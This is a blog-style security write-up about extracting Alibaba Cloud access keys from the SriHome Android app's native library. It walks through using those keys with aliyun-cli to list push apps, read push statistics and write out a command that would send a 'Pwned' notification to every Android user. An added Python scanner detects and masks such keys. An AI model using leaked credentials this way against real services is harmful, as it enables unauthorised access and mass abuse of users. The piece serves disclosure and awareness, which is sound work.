Pwning SriHome: Chapter 2
Hold on a sec, did you check out the first chapter yet? If not, you might want to give it a read first. Head over there and catch up, then we’ll continue. Pwning SriHome: Chapter 1
Continuation
After successfully gaining access to their storage bucket and browsing through some files, I couldn’t shake the feeling that there might be more to uncover. So, I decided to backtrack to the initial point where I found the credentials - the libJNat.so file.
More Keys!
Since they were messing around with Alibaba’s cloud stuff, I thought, ‘Hey, there might be more sneaky credentials lying around.’ So, following GitGuardian’s lead with their fancy LT[A6]I pattern for access key IDs, I fired up a quick grep search. Lo and behold, I hit the jackpot - found another key along with its secret just hanging out there!
strings SriHome_21.9.24_Apkpure/lib/armeabi-v7a/libJNat.so | grep -A 1 'LT[A6]I'
LTAI...SSq
L01...BCd
--
LTA...CLu
J14...ESm
Note: Oh, and by the way, if you’re wondering why I used -A 1 in grep, it’s because it grabs one more line after the match, and that’s usually where the secret key hangs out - because they come in pairs :P
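As an added example (not code from the original post), here is a small Python scanner that automates the strings | grep step above so the same check can run over build artifacts before release: it pulls printable strings out of a native library, flags Alibaba AccessKey IDs with the same LT[A6]I pattern, pairs each with the string that follows it, and masks whatever it reports. The sample blob, the function names and the 30-character secret length are constructed assumptions.

```python
import re
import sys

# Alibaba Cloud AccessKey IDs start with "LTAI"; LT[A6]I is the broader
# GitGuardian pattern the post grepped for. In this library the 30-character
# secret sits in the very next string, which is why grep -A 1 caught it.
ACCESS_KEY_RE = re.compile(rb"LT[A6]I[A-Za-z0-9]{12,24}")
SECRET_RE = re.compile(rb"[A-Za-z0-9]{30}")


def extract_strings(blob: bytes, min_len: int = 4) -> list[tuple[int, bytes]]:
    """Mimic `strings`: (offset, run) for printable-ASCII runs >= min_len."""
    return [(m.start(), m.group())
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, blob)]


def mask(value: bytes) -> str:
    """Never log a whole credential; keep only a recognisable prefix/suffix."""
    text = value.decode("ascii")
    return text[:3] + "..." + text[-3:]


def find_alibaba_keys(blob: bytes) -> list[dict]:
    """Report each AccessKey ID candidate and the string that follows it."""
    strs = extract_strings(blob)
    hits = []
    for i, (offset, s) in enumerate(strs):
        if not ACCESS_KEY_RE.fullmatch(s):
            continue
        nxt = strs[i + 1][1] if i + 1 < len(strs) else b""
        hits.append({
            "offset": offset,
            "access_key_id": mask(s),
            # Only the paired layout seen in the post is flagged; otherwise None
            "secret_candidate": mask(nxt) if SECRET_RE.fullmatch(nxt) else None,
        })
    return hits


# Constructed sample blob (not the real libJNat.so): two key/secret pairs plus
# one lone key ID, laid out NUL-separated like a .so string table.
SAMPLE_LIB = b"\x00".join([
    b"\x7fELF", b"ali push", b"cloudpush.aliyuncs.com",
    b"LTAIFAKEKEYID000000001", b"SECRETFAKE" + b"0" * 19 + b"1",
    b"LTAIFAKEKEYID000000002", b"SECRETFAKE" + b"0" * 19 + b"2",
    b"LTAIORPHANKEYID0000003", b"push success to:%s title:%s body:%s",
])

if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_LIB
    for hit in find_alibaba_keys(data):
        print(hit)
```

Run it with a path to any native library as the first argument; with no argument it scans the constructed sample.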
Alright, let’s set up that second batch of credentials with aliyun-cli, but this time, let’s name the profile sricam to keep things organized.
aliyun configure --profile sricam
Configuring profile 'sricam' in 'AK' authenticate mode...
Access Key Id []: LTA......SSq
Access Key Secret []: L01......BCd
Default Region Id []: us-west-1
Default Output Format [json]: json (Only support json)
Default Language [zh|en] en:
Saving profile[sricam] ...Done.
Configure Done!!!
However, it seems that these credentials don’t grant access to any OSS buckets.
aliyun oss ls --profile sricam
ERROR: oss: service returned error: StatusCode=403, ErrorCode=AccessDenied, ErrorMessage="You are forbidden to list buckets.", RequestId=65D65B9DE2741F35326A81C4, Ec=0003-00000202
I gave both sets of credentials a spin across common services like ecs, rds, and cloudapi, but no luck. It seems they didn’t have access to any of those.
I hit a bit of a roadblock, so I decided to try something different. I started poking around by grepping for the strings ‘alibaba’ and ‘aliyun’ in the libJNat.so file. I found a match for “cloudpush.aliyuncs.com”.
strings SriHome_21.9.24_Apkpure/lib/armeabi-v7a/libJNat.so | grep alibaba
strings SriHome_21.9.24_Apkpure/lib/armeabi-v7a/libJNat.so | grep aliyun
cloudpush.aliyuncs.com
Then, while I was at it, I decided to grep for the word ‘push’ and stumbled upon ‘ali push’. A quick Google search later, and it turns out it’s a message push service.
strings SriHome_21.9.24_Apkpure/lib/armeabi-v7a/libJNat.so | grep push
...
ali push
cloudpush.aliyuncs.com
push success to:%s title:%s body:%s
...
I also went the extra mile and confirmed that the application was indeed using the push service by decompiling it with jadx. Here’s what I found:
Alright, now that we know it’s definitely utilizing the message push service, let’s brainstorm some ways to leverage it.
After digging through aliyun push --help, I stumbled upon ListSummaryApps, a command that lists all the applications using the push service.
aliyun push ListSummaryApps
{
  "RequestId": "22E9DE0F-7EF6-5E2A-BECC-D8156431D2A8",
  "SummaryAppInfos": {
    "SummaryAppInfo": [
      {
        "AppKey": 25539843,
        "AppName": "ifHome"
      },
      {
        "AppKey": 25548841,
        "AppName": "SriHomeNew"
      },
      {
        "AppKey": 24738117,
        "AppName": "SriHome"
      },
      {
        "AppKey": 24732061,
        "AppName": "ifHome"
      }
    ]
  }
}
Sweet! With the AppKeys for all the applications in hand, let’s dive deeper and gather some statistics using QueryPushStatByApp.
aliyun push QueryPushStatByApp --AppKey 24738117 --StartTime 2024-01-01T00:00:00Z --EndTime 2024-02-01T00:00:00Z --Granularity DAY
{
  "AppPushStats": {
    "AppPushStat": [
      {
        "AcceptCount": 6331760,
        "DeletedCount": 0,
        "OpenedCount": 11851,
        "ReceivedCount": 5022263,
        "SentCount": 5023691,
        "Time": "2023-12-31T16:00:00Z"
      },
      {
        "AcceptCount": 6242835,
        "DeletedCount": 0,
        "OpenedCount": 10946,
        "ReceivedCount": 4937240,
        "SentCount": 4938704,
        "Time": "2024-01-01T16:00:00Z"
      },
      ...
Alright, querying data is cool, but let’s spice things up a bit. How about we take a peek at PushNoticeToAndroid? Now, that sounds interesting!
After a quick glance through the docs, it seems we’ll need:
- AppKey - we got these!
- Target - ALL, DEVICE, ACCOUNT, ALIAS, TAG (available options)
- TargetValue - Set according to Target. Use commas to separate multiple values. If the limit is exceeded, you need to push it multiple times.
  Target=DEVICE, the value is as follows deviceid111,deviceid1111 (up to 1000 supported).
  Target=ACCOUNT, the value is as follows account111,account222 (up to 1000 supported).
  Target=ALIAS, the value is as follows alias111,alias222 (supports up to 1000).
  Target=TAG, supports single Tag and multiple Tags. For the format, please refer to Tag Format.
  Target=ALL, the value is ALL.
- Title
- Body
aliyun push PushNoticeToAndroid --AppKey 25548841 --Target ALL --TargetValue ALL --Title deathflash --Body Pwned
Alright, so if I ran the above, it would shoot out a notification to all Android app users with the title “deathflash” and “Pwned” as the content… quite tempting, but let’s hold off on that, shall we?
Conclusion
Even though mobile push is a basic service, it’s alarming to realize how easily it could be exploited to harm application users.